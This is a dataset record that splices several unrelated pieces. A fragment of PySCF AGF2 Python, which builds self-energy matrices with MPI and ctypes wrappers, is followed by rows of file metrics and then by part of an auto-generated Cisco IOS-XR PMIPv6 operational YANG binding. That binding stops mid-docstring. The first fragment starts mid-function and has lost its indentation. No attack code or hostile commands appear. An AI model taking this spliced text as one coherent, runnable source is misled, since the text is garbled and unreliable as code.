eja = lib.direct_sum('j,a->ja', e_occ, -e_vir)
eja = eja.ravel()
for i in mpi_helper.nrange(nocc):
xija = qeri[:,i].reshape(nmo, -1)
xjia = qeri[:,:,i].reshape(nmo, -1)
eija = eja + e_occ[i]
vv = lib.dot(xija, xija.T, alpha=fpos, beta=1, c=vv)
vv = lib.dot(xija, xjia.T, alpha=fneg, beta=1, c=vv)
exija = xija * eija[None]
vev = lib.dot(exija, xija.T, alpha=fpos, beta=1, c=vev)
vev = lib.dot(exija, xjia.T, alpha=fneg, beta=1, c=vev)
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
def build_mats_dfragf2_incore(qxi, qja, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Wrapper for AGF2df_vv_vev_islice
'''
fdrv = getattr(libagf2, 'AGF2df_vv_vev_islice')
naux = qxi.shape[0]
nocc = e_occ.size
nvir = e_vir.size
nmo = qxi.size // (naux*nocc)
assert qxi.size == (naux * nmo * nocc)
assert qja.size == (naux * nocc * nvir)
qxi = np.asarray(qxi, order='C')
qja = np.asarray(qja, order='C')
e_i = np.asarray(e_occ, order='C')
e_a = np.asarray(e_vir, order='C')
rank, size = mpi_helper.rank, mpi_helper.size
vv = np.zeros((nmo*nmo))
vev = np.zeros((nmo*nmo))
start = rank * nocc // size
end = nocc if rank == (size-1) else (rank+1) * nocc // size
fdrv(qxi.ctypes.data_as(ctypes.c_void_p),
qja.ctypes.data_as(ctypes.c_void_p),
e_i.ctypes.data_as(ctypes.c_void_p),
e_a.ctypes.data_as(ctypes.c_void_p),
ctypes.c_double(os_factor),
ctypes.c_double(ss_factor),
ctypes.c_int(nmo),
ctypes.c_int(nocc),
ctypes.c_int(nvir),
ctypes.c_int(naux),
ctypes.c_int(start),
ctypes.c_int(end),
vv.ctypes.data_as(ctypes.c_void_p),
vev.ctypes.data_as(ctypes.c_void_p))
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
def build_mats_dfragf2_lowmem(qxi, qja, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Wrapper for AGF2df_vv_vev_islice_lowmem
'''
fdrv = getattr(libagf2, 'AGF2df_vv_vev_islice_lowmem')
naux = qxi.shape[0]
nocc = e_occ.size
nvir = e_vir.size
nmo = qxi.size // (naux*nocc)
assert qxi.size == (naux * nmo * nocc)
assert qja.size == (naux * nocc * nvir)
qxi = np.asarray(qxi, order='C')
qja = np.asarray(qja, order='C')
e_i = np.asarray(e_occ, order='C')
e_a = np.asarray(e_vir, order='C')
rank, size = mpi_helper.rank, mpi_helper.size
vv = np.zeros((nmo*nmo))
vev = np.zeros((nmo*nmo))
start = rank * (nocc * nocc) // size
end = nocc*nocc if rank == (size-1) else (rank+1) * (nocc*nocc) // size
fdrv(qxi.ctypes.data_as(ctypes.c_void_p),
qja.ctypes.data_as(ctypes.c_void_p),
e_i.ctypes.data_as(ctypes.c_void_p),
e_a.ctypes.data_as(ctypes.c_void_p),
ctypes.c_double(os_factor),
ctypes.c_double(ss_factor),
ctypes.c_int(nmo),
ctypes.c_int(nocc),
ctypes.c_int(nvir),
ctypes.c_int(naux),
ctypes.c_int(start),
ctypes.c_int(end),
vv.ctypes.data_as(ctypes.c_void_p),
vev.ctypes.data_as(ctypes.c_void_p))
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
def build_mats_dfragf2_outcore(qxi, qja, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Python version of AGF2df_vv_vev_islice to support outcore
'''
naux = qxi.shape[0]
nocc = e_occ.size
nvir = e_vir.size
nmo = qxi.size // (naux*nocc)
assert qxi.size == (naux * nmo * nocc)
assert qja.size == (naux * nocc * nvir)
vv = np.zeros((nmo, nmo))
vev = np.zeros((nmo, nmo))
fpos = os_factor + ss_factor
fneg = -ss_factor
eja = lib.direct_sum('j,a->ja', e_occ, -e_vir)
eja = eja.ravel()
buf = (np.zeros((nmo, nocc*nvir)), np.zeros((nmo*nocc, nvir)))
for i in mpi_helper.nrange(nocc):
qx = qxi.reshape(naux, nmo, nocc)[:,:,i]
xija = lib.dot(qx.T, qja, c=buf[0])
xjia = lib.dot(qxi.T, qja[:,i*nvir:(i+1)*nvir], c=buf[1])
xjia = xjia.reshape(nmo, nocc*nvir)
eija = eja + e_occ[i]
vv = lib.dot(xija, xija.T, alpha=fpos, beta=1, c=vv)
vv = lib.dot(xija, xjia.T, alpha=fneg, beta=1, c=vv)
exija = xija * eija[None]
vev = lib.dot(exija, xija.T, alpha=fpos, beta=1, c=vev)
vev = lib.dot(exija, xjia.T, alpha=fneg, beta=1, c=vev)
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
def build_mats_uagf2_incore(qeri, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Wraps AGF2uee_vv_vev_islice
'''
fdrv = getattr(libagf2, 'AGF2uee_vv_vev_islice')
assert qeri[0].ndim == qeri[1].ndim == 4
nmo = qeri[0].shape[0]
noa, nob = e_occ[0].size, e_occ[1].size
nva, nvb = e_vir[0].size, e_vir[1].size
qeri_a = np.asarray(qeri[0], order='C')
qeri_b = np.asarray(qeri[1], order='C')
e_i = np.asarray(e_occ[0], order='C')
e_I = np.asarray(e_occ[1], order='C')
e_a = np.asarray(e_vir[0], order='C')
e_A = np.asarray(e_vir[1], order='C')
vv = np.zeros((nmo*nmo))
vev = np.zeros((nmo*nmo))
rank, size = mpi_helper.rank, mpi_helper.size
istart = rank * noa // size
iend = noa if rank == (size-1) else (rank+1) * noa // size
fdrv(qeri_a.ctypes.data_as(ctypes.c_void_p),
qeri_b.ctypes.data_as(ctypes.c_void_p),
e_i.ctypes.data_as(ctypes.c_void_p),
e_I.ctypes.data_as(ctypes.c_void_p),
e_a.ctypes.data_as(ctypes.c_void_p),
e_A.ctypes.data_as(ctypes.c_void_p),
ctypes.c_double(os_factor),
ctypes.c_double(ss_factor),
ctypes.c_int(nmo),
ctypes.c_int(noa),
ctypes.c_int(nob),
ctypes.c_int(nva),
ctypes.c_int(nvb),
ctypes.c_int(istart),
ctypes.c_int(iend),
vv.ctypes.data_as(ctypes.c_void_p),
vev.ctypes.data_as(ctypes.c_void_p))
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
def build_mats_uagf2_outcore(qeri, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Python version of AGF2uee_vv_vev_islice to support outcore
'''
assert qeri[0].ndim == qeri[1].ndim == 4
nmo = qeri[0].shape[0]
# noa, nob = e_occ[0].size, e_occ[1].size
# nva, nvb = e_vir[0].size, e_vir[1].size
noa = e_occ[0].size
vv = np.zeros((nmo, nmo))
vev = np.zeros((nmo, nmo))
fposa = ss_factor
fnega = -ss_factor
fposb = os_factor
eja_a = lib.direct_sum('j,a->ja', e_occ[0], -e_vir[0]).ravel()
eja_b = lib.direct_sum('j,a->ja', e_occ[1], -e_vir[1]).ravel()
for i in mpi_helper.nrange(noa):
xija_aa = qeri[0][:,i].reshape(nmo, -1)
xija_ab = qeri[1][:,i].reshape(nmo, -1)
xjia_aa = qeri[0][:,:,i].reshape(nmo, -1)
eija_aa = eja_a + e_occ[0][i]
eija_ab = eja_b + e_occ[0][i]
vv = lib.dot(xija_aa, xija_aa.T, alpha=fposa, beta=1, c=vv)
vv = lib.dot(xija_aa, xjia_aa.T, alpha=fnega, beta=1, c=vv)
vv = lib.dot(xija_ab, xija_ab.T, alpha=fposb, beta=1, c=vv)
exija_aa = xija_aa * eija_aa[None]
exija_ab = xija_ab * eija_ab[None]
vev = lib.dot(exija_aa, xija_aa.T, alpha=fposa, beta=1, c=vev)
vev = lib.dot(exija_aa, xjia_aa.T, alpha=fnega, beta=1, c=vev)
vev = lib.dot(exija_ab, xija_ab.T, alpha=fposb, beta=1, c=vev)
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
def build_mats_dfuagf2_incore(qxi, qja, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Wrapper for AGF2udf_vv_vev_islice
'''
fdrv = getattr(libagf2, 'AGF2udf_vv_vev_islice')
naux = qxi[0].shape[0]
noa, nob = e_occ[0].size, e_occ[1].size
nva, nvb = e_vir[0].size, e_vir[1].size
nmo = qxi[0].size // (naux*noa)
assert qxi[0].size == (naux * nmo * noa)
assert qja[0].size == (naux * noa * nva)
assert qja[1].size == (naux * nob * nvb)
qxi_a, qxi_b = qxi
qja_a, qja_b = qja
qxi = np.asarray(qxi_a, order='C')
qja = np.asarray(qja_a, order='C')
qJA = np.asarray(qja_b, order='C')
e_i = np.asarray(e_occ[0], order='C')
e_I = np.asarray(e_occ[1], order='C')
e_a = np.asarray(e_vir[0], order='C')
e_A = np.asarray(e_vir[1], order='C')
vv = np.zeros((nmo*nmo))
vev = np.zeros((nmo*nmo))
rank, size = mpi_helper.rank, mpi_helper.size
istart = rank * noa // size
iend = noa if rank == (size-1) else (rank+1) * noa // size
fdrv(qxi.ctypes.data_as(ctypes.c_void_p),
qja.ctypes.data_as(ctypes.c_void_p),
qJA.ctypes.data_as(ctypes.c_void_p),
e_i.ctypes.data_as(ctypes.c_void_p),
e_I.ctypes.data_as(ctypes.c_void_p),
e_a.ctypes.data_as(ctypes.c_void_p),
e_A.ctypes.data_as(ctypes.c_void_p),
ctypes.c_double(os_factor),
ctypes.c_double(ss_factor),
ctypes.c_int(nmo),
ctypes.c_int(noa),
ctypes.c_int(nob),
ctypes.c_int(nva),
ctypes.c_int(nvb),
ctypes.c_int(naux),
ctypes.c_int(istart),
ctypes.c_int(iend),
vv.ctypes.data_as(ctypes.c_void_p),
vev.ctypes.data_as(ctypes.c_void_p))
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
def build_mats_dfuagf2_lowmem(qxi, qja, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Wrapper for AGF2udf_vv_vev_islice_lowmem
'''
fdrv = getattr(libagf2, 'AGF2udf_vv_vev_islice_lowmem')
naux = qxi[0].shape[0]
noa, nob = e_occ[0].size, e_occ[1].size
nva, nvb = e_vir[0].size, e_vir[1].size
nmo = qxi[0].size // (naux*noa)
assert qxi[0].size == (naux * nmo * noa)
assert qja[0].size == (naux * noa * nva)
assert qja[1].size == (naux * nob * nvb)
qxi_a, qxi_b = qxi
qja_a, qja_b = qja
qxi = np.asarray(qxi_a, order='C')
qja = np.asarray(qja_a, order='C')
qJA = np.asarray(qja_b, order='C')
e_i = np.asarray(e_occ[0], order='C')
e_I = np.asarray(e_occ[1], order='C')
e_a = np.asarray(e_vir[0], order='C')
e_A = np.asarray(e_vir[1], order='C')
vv = np.zeros((nmo*nmo))
vev = np.zeros((nmo*nmo))
rank, size = mpi_helper.rank, mpi_helper.size
nomax = max(noa, nob)
start = rank * (noa*nomax) // size
end = (noa*nomax) if rank == (size-1) else (rank+1) * (noa*nomax) // size
fdrv(qxi.ctypes.data_as(ctypes.c_void_p),
qja.ctypes.data_as(ctypes.c_void_p),
qJA.ctypes.data_as(ctypes.c_void_p),
e_i.ctypes.data_as(ctypes.c_void_p),
e_I.ctypes.data_as(ctypes.c_void_p),
e_a.ctypes.data_as(ctypes.c_void_p),
e_A.ctypes.data_as(ctypes.c_void_p),
ctypes.c_double(os_factor),
ctypes.c_double(ss_factor),
ctypes.c_int(nmo),
ctypes.c_int(noa),
ctypes.c_int(nob),
ctypes.c_int(nva),
ctypes.c_int(nvb),
ctypes.c_int(naux),
ctypes.c_int(start),
ctypes.c_int(end),
vv.ctypes.data_as(ctypes.c_void_p),
vev.ctypes.data_as(ctypes.c_void_p))
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
def build_mats_dfuagf2_outcore(qxi, qja, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Python version of AGF2udf_vv_vev_islice to support outcore
'''
naux = qxi[0].shape[0]
noa, nob = e_occ[0].size, e_occ[1].size
nva, nvb = e_vir[0].size, e_vir[1].size
nmo = qxi[0].size // (naux*noa)
assert qxi[0].size == (naux * nmo * noa)
assert qja[0].size == (naux * noa * nva)
assert qja[1].size == (naux * nob * nvb)
qxi_a, qxi_b = qxi
qja_a, qja_b = qja
vv = np.zeros((nmo, nmo))
vev = np.zeros((nmo, nmo))
fposa = ss_factor
fnega = -ss_factor
fposb = os_factor
eja_a = lib.direct_sum('j,a->ja', e_occ[0], -e_vir[0]).ravel()
eja_b = lib.direct_sum('j,a->ja', e_occ[1], -e_vir[1]).ravel()
buf = (np.zeros((nmo, noa*nva)),
np.zeros((nmo, nob*nvb)),
np.zeros((nmo*noa, nva)))
for i in mpi_helper.nrange(noa):
qx_a = qxi_a.reshape(naux, nmo, noa)[:,:,i]
xija_aa = lib.dot(qx_a.T, qja_a, c=buf[0])
xija_ab = lib.dot(qx_a.T, qja_b, c=buf[1])
xjia_aa = lib.dot(qxi_a.T, qja_a[:,i*nva:(i+1)*nva], c=buf[2])
xjia_aa = xjia_aa.reshape(nmo, -1)
eija_aa = eja_a + e_occ[0][i]
eija_ab = eja_b + e_occ[0][i]
vv = lib.dot(xija_aa, xija_aa.T, alpha=fposa, beta=1, c=vv)
vv = lib.dot(xija_aa, xjia_aa.T, alpha=fnega, beta=1, c=vv)
vv = lib.dot(xija_ab, xija_ab.T, alpha=fposb, beta=1, c=vv)
exija_aa = xija_aa * eija_aa[None]
exija_ab = xija_ab * eija_ab[None]
vev = lib.dot(exija_aa, xija_aa.T, alpha=fposa, beta=1, c=vev)
vev = lib.dot(exija_aa, xjia_aa.T, alpha=fnega, beta=1, c=vev)
vev = lib.dot(exija_ab, xija_ab.T, alpha=fposb, beta=1, c=vev)
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
def get_blksize(max_memory_total, *sizes):
''' Gets a block size such that the sum of the product of
:attr:`sizes` with :attr:`blksize` is less than avail
memory.
If multiple tuples are provided, the maximum is used.
'''
if isinstance(sizes[0], tuple):
sum_of_sizes = max([sum(x) for x in sizes])
else:
sum_of_sizes = sum(sizes)
mem_avail = max_memory_total - lib.current_memory()[0]
mem_avail *= 8e6 # MB -> bits
sum_of_sizes *= 64 # 64 bits -> bits
return int(mem_avail / sum_of_sizes)
| 30.331667
| 85
| 0.614869
| 3,077
| 18,199
| 3.428989
| 0.084823
| 0.063027
| 0.048905
| 0.073358
| 0.804284
| 0.786655
| 0.777557
| 0.751114
| 0.736328
| 0.733675
| 0
| 0.016437
| 0.234463
| 18,199
| 599
| 86
| 30.382304
| 0.740884
| 0.109512
| 0
| 0.805
| 0
| 0
| 0.013544
| 0.006054
| 0
| 0
| 0
| 0
| 0.0475
| 1
| 0.03
| false
| 0
| 0.01
| 0
| 0.07
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f482d622367b65ba522d042e0ad906c70e578a43
| 294,370
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ip_mobileip_oper.py
|
Maikor/ydk-py
|
b86c4a7c570ae3b2c5557d098420446df5de4929
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ip_mobileip_oper.py
|
Maikor/ydk-py
|
b86c4a7c570ae3b2c5557d098420446df5de4929
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ip_mobileip_oper.py
|
Maikor/ydk-py
|
b86c4a7c570ae3b2c5557d098420446df5de4929
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
""" Cisco_IOS_XR_ip_mobileip_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR ip\-mobileip package operational data.
This module contains definitions
for the following management objects\:
pmipv6\: Proxy Mobile IPv6
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Pmipv6Addr(Enum):
"""
Pmipv6Addr (Enum Class)
Address Types
.. data:: none = 0
None
.. data:: ipv4 = 1
IPV4 Address
.. data:: ipv6 = 2
IPV6 Address
.. data:: pmipv6_addr_ipv4_ipv6 = 3
Both IPV4 and IPV6 Address
"""
none = Enum.YLeaf(0, "none")
ipv4 = Enum.YLeaf(1, "ipv4")
ipv6 = Enum.YLeaf(2, "ipv6")
pmipv6_addr_ipv4_ipv6 = Enum.YLeaf(3, "pmipv6-addr-ipv4-ipv6")
class Pmipv6Encap(Enum):
"""
Pmipv6Encap (Enum Class)
ENCAP Types
.. data:: none = 0
None
.. data:: ipv6 = 1
IPV6 Tunnel
.. data:: ipv6_ipv4 = 2
IPV6 in IPV4 Tunnel
.. data:: ipv6_udp = 3
IPV6 in IPV4 UDP Tunnel
.. data:: gre_ipv4 = 4
GRE IPV4 Tunnel
.. data:: gre_ipv6 = 5
GRE IPV6 Tunnel
.. data:: gre = 6
GRE Tunnel
.. data:: mgre_ipv4 = 7
MGRE IPV4 Tunnel
.. data:: mgre_ipv6 = 8
MGRE IPV6 Tunnel
.. data:: mip_udp = 9
MIP UDP Tunnel
.. data:: mip_mudp = 10
MIP MUDP Tunnel
.. data:: max = 11
MAX Encap Type
"""
none = Enum.YLeaf(0, "none")
ipv6 = Enum.YLeaf(1, "ipv6")
ipv6_ipv4 = Enum.YLeaf(2, "ipv6-ipv4")
ipv6_udp = Enum.YLeaf(3, "ipv6-udp")
gre_ipv4 = Enum.YLeaf(4, "gre-ipv4")
gre_ipv6 = Enum.YLeaf(5, "gre-ipv6")
gre = Enum.YLeaf(6, "gre")
mgre_ipv4 = Enum.YLeaf(7, "mgre-ipv4")
mgre_ipv6 = Enum.YLeaf(8, "mgre-ipv6")
mip_udp = Enum.YLeaf(9, "mip-udp")
mip_mudp = Enum.YLeaf(10, "mip-mudp")
max = Enum.YLeaf(11, "max")
class Pmipv6Role(Enum):
"""
Pmipv6Role (Enum Class)
PMIPV6 Role Types
.. data:: wlan = 0
WLAN
.. data:: gpp = 1
3GPP
.. data:: lte = 2
LTE
.. data:: wi_max = 3
WiMAX
.. data:: gma = 4
3GMA
.. data:: rmax = 5
MAX Role
"""
wlan = Enum.YLeaf(0, "wlan")
gpp = Enum.YLeaf(1, "gpp")
lte = Enum.YLeaf(2, "lte")
wi_max = Enum.YLeaf(3, "wi-max")
gma = Enum.YLeaf(4, "gma")
rmax = Enum.YLeaf(5, "rmax")
class Pmipv6(Entity):
"""
Proxy Mobile IPv6
.. attribute:: lma
None
**type**\: :py:class:`Lma <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6, self).__init__()
self._top_entity = None
self.yang_name = "pmipv6"
self.yang_parent_name = "Cisco-IOS-XR-ip-mobileip-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("lma", ("lma", Pmipv6.Lma))])
self._leafs = OrderedDict()
self.lma = Pmipv6.Lma()
self.lma.parent = self
self._children_name_map["lma"] = "lma"
self._segment_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6, [], name, value)
class Lma(Entity):
"""
None
.. attribute:: statistics
None
**type**\: :py:class:`Statistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics>`
.. attribute:: bindings
Table of Binding
**type**\: :py:class:`Bindings <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Bindings>`
.. attribute:: heartbeats
Table of Heartbeat
**type**\: :py:class:`Heartbeats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Heartbeats>`
.. attribute:: config_variables
Global Configuration Variables
**type**\: :py:class:`ConfigVariables <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma, self).__init__()
self.yang_name = "lma"
self.yang_parent_name = "pmipv6"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("statistics", ("statistics", Pmipv6.Lma.Statistics)), ("bindings", ("bindings", Pmipv6.Lma.Bindings)), ("heartbeats", ("heartbeats", Pmipv6.Lma.Heartbeats)), ("config-variables", ("config_variables", Pmipv6.Lma.ConfigVariables))])
self._leafs = OrderedDict()
self.statistics = Pmipv6.Lma.Statistics()
self.statistics.parent = self
self._children_name_map["statistics"] = "statistics"
self.bindings = Pmipv6.Lma.Bindings()
self.bindings.parent = self
self._children_name_map["bindings"] = "bindings"
self.heartbeats = Pmipv6.Lma.Heartbeats()
self.heartbeats.parent = self
self._children_name_map["heartbeats"] = "heartbeats"
self.config_variables = Pmipv6.Lma.ConfigVariables()
self.config_variables.parent = self
self._children_name_map["config_variables"] = "config-variables"
self._segment_path = lambda: "lma"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma, [], name, value)
class Statistics(Entity):
"""
None
.. attribute:: customer_statistics
Table of CustomerStatistics
**type**\: :py:class:`CustomerStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics>`
.. attribute:: license
LMA License Statistics
**type**\: :py:class:`License <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.License>`
.. attribute:: global_
Global Statistics
**type**\: :py:class:`Global <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global>`
.. attribute:: mag_statistics
Table of MAGStatistics
**type**\: :py:class:`MagStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.MagStatistics>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics, self).__init__()
self.yang_name = "statistics"
self.yang_parent_name = "lma"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("customer-statistics", ("customer_statistics", Pmipv6.Lma.Statistics.CustomerStatistics)), ("license", ("license", Pmipv6.Lma.Statistics.License)), ("global", ("global_", Pmipv6.Lma.Statistics.Global)), ("mag-statistics", ("mag_statistics", Pmipv6.Lma.Statistics.MagStatistics))])
self._leafs = OrderedDict()
self.customer_statistics = Pmipv6.Lma.Statistics.CustomerStatistics()
self.customer_statistics.parent = self
self._children_name_map["customer_statistics"] = "customer-statistics"
self.license = Pmipv6.Lma.Statistics.License()
self.license.parent = self
self._children_name_map["license"] = "license"
self.global_ = Pmipv6.Lma.Statistics.Global()
self.global_.parent = self
self._children_name_map["global_"] = "global"
self.mag_statistics = Pmipv6.Lma.Statistics.MagStatistics()
self.mag_statistics.parent = self
self._children_name_map["mag_statistics"] = "mag-statistics"
self._segment_path = lambda: "statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics, [], name, value)
class CustomerStatistics(Entity):
"""
Table of CustomerStatistics
.. attribute:: customer_statistic
Customer statistics
**type**\: list of :py:class:`CustomerStatistic <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics, self).__init__()
self.yang_name = "customer-statistics"
self.yang_parent_name = "statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("customer-statistic", ("customer_statistic", Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic))])
self._leafs = OrderedDict()
self.customer_statistic = YList(self)
self._segment_path = lambda: "customer-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics, [], name, value)
class CustomerStatistic(Entity):
"""
Customer statistics
.. attribute:: customer_name (key)
Customer Name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: protocol_statistics
LMA Protocol Statistics
**type**\: :py:class:`ProtocolStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics>`
.. attribute:: accounting_statistics
LMA Accounting Statistics
**type**\: :py:class:`AccountingStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.AccountingStatistics>`
.. attribute:: lma_identifier
LMA Identifier
**type**\: str
.. attribute:: bce_count
Count of Bindings
**type**\: int
**range:** 0..4294967295
.. attribute:: handoff_count
Count of Handoffs
**type**\: int
**range:** 0..4294967295
.. attribute:: ipv4_mnp_count
Count of IPv4 Mobile Node Prefixes
**type**\: int
**range:** 0..4294967295
.. attribute:: ipv6_mnp_count
Count of IPv6 Mobile Node Prefixes
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic, self).__init__()
self.yang_name = "customer-statistic"
self.yang_parent_name = "customer-statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['customer_name']
self._child_classes = OrderedDict([("protocol-statistics", ("protocol_statistics", Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics)), ("accounting-statistics", ("accounting_statistics", Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.AccountingStatistics))])
self._leafs = OrderedDict([
('customer_name', (YLeaf(YType.str, 'customer-name'), ['str'])),
('lma_identifier', (YLeaf(YType.str, 'lma-identifier'), ['str'])),
('bce_count', (YLeaf(YType.uint32, 'bce-count'), ['int'])),
('handoff_count', (YLeaf(YType.uint32, 'handoff-count'), ['int'])),
('ipv4_mnp_count', (YLeaf(YType.uint32, 'ipv4-mnp-count'), ['int'])),
('ipv6_mnp_count', (YLeaf(YType.uint32, 'ipv6-mnp-count'), ['int'])),
])
self.customer_name = None
self.lma_identifier = None
self.bce_count = None
self.handoff_count = None
self.ipv4_mnp_count = None
self.ipv6_mnp_count = None
self.protocol_statistics = Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics()
self.protocol_statistics.parent = self
self._children_name_map["protocol_statistics"] = "protocol-statistics"
self.accounting_statistics = Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.AccountingStatistics()
self.accounting_statistics.parent = self
self._children_name_map["accounting_statistics"] = "accounting-statistics"
self._segment_path = lambda: "customer-statistic" + "[customer-name='" + str(self.customer_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/customer-statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic, ['customer_name', 'lma_identifier', 'bce_count', 'handoff_count', 'ipv4_mnp_count', 'ipv6_mnp_count'], name, value)
class ProtocolStatistics(Entity):
"""
LMA Protocol Statistics
.. attribute:: pbu_receive_statistics
PBU Receive Statistics
